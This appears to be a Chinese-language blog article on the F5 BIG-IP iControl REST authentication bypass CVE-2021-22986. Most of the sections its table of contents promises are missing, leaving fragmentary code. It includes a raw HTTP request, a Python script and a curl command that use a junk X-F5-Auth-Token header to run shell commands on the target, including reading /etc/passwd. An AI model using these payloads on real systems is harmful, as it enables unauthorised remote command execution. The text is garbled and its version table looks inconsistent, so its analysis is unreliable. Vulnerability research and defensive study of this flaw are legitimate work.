# F5 BIG-IP iControl REST CVE-2021-22986漏洞的分析與利用
## 摘要
本文深入剖析CVE-2021-22986漏洞的技術細節,包括F5 BIG-IP iControl REST接口的身份認證繞過機制、漏洞成因、影響范圍、利用方法及防御措施。通過流量分析、PoC構造和補丁對比,揭示該高危漏洞的利用鏈,并提供完整的滲透測試實踐方案。
---
## 目錄
1. [漏洞概述](#1-漏洞概述)
2. [技術背景](#2-技術背景)
- 2.1 F5 BIG-IP架構
- 2.2 iControl REST接口
3. [漏洞分析](#3-漏洞分析)
- 3.1 漏洞成因
- 3.2 受影響版本
- 3.3 CWE分類
4. [利用鏈構建](#4-利用鏈構建)
- 4.1 認證繞過原理
- 4.2 請求偽造技術
5. [滲透測試實踐](#5-滲透測試實踐)
- 5.1 環境搭建
- 5.2 PoC構造
- 5.3 漏洞驗證
6. [防御方案](#6-防御方案)
- 6.1 官方補丁
- 6.2 臨時緩解措施
7. [漏洞啟示](#7-漏洞啟示)
8. [附錄](#8-附錄)
---
## 1. 漏洞概述
CVE-2021-22986是F5 BIG-IP iControl REST接口中的身份認證繞過漏洞(CVSS 9.8),攻擊者可通過構造惡意HTTP請求未授權訪問管理接口,導致遠程代碼執行(RCE)。該漏洞影響16.x、15.x、14.x、13.x等多個版本。
---
## 2. 技術背景
### 2.1 F5 BIG-IP架構
```mermaid
graph TD
A[客戶端] --> B[流量管理模塊]
B --> C[虛擬服務器]
C --> D[策略引擎]
D --> E[后端服務]
F[iControl REST] --> G[配置管理]
/mgmt/tm/util/bash
/mgmt/cm/device/tasks
根本原因在于請求處理邏輯缺陷:
# 偽代碼:存在缺陷的認證校驗
def handle_request(request):
if "X-F5-Auth-Token" in request.headers:
return bypass_auth() # 漏洞觸發點
else:
return normal_auth()
| 版本分支 | 受影響版本 | 修復版本 |
|---|---|---|
| 16.x | <16.0.1 | 16.1.0 |
| 15.x | <15.1.3 | 15.1.4 |
POST /mgmt/tm/util/bash HTTP/1.1
Host: target
X-F5-Auth-Token: junk
Authorization: Basic invalid
{"command":"run","utilCmdArgs":"-c 'id'"}
import requests
url = "https://target/mgmt/tm/util/bash"
headers = {"X-F5-Auth-Token": "x", "Content-Type": "application/json"}
data = {"command":"run", "utilCmdArgs":"-c 'cat /etc/passwd'"}
response = requests.post(url, json=data, headers=headers, verify=False)
print(response.text)
curl -k -X POST "https://192.168.1.100/mgmt/tm/util/bash" \
-H "X-F5-Auth-Token: x" \
-H "Content-Type: application/json" \
-d '{"command":"run","utilCmdArgs":"-c \'uname -a\'"}'
15.x -> 15.1.5 (Hotfix-BIGIP-15.1.5-0.0.11)
14.x -> 14.1.4.6
# iRule防御示例
when HTTP_REQUEST {
if { [HTTP::header exists "X-F5-Auth-Token"] } {
drop
}
}
”`
